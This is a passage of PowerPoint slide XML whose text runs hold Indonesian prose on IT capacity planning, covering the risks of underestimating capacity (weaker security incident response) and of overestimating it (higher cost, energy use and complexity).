              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertumbuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggapnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melebih-lebihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>negatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengeluaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>personel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membebani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kritis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemanfaatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemanfaatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>negatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>investasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (ROI) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Menaksir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>energi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menaikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jejak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karbon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengerahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleksitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kompleksitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tantangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelesaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peluang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>investasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
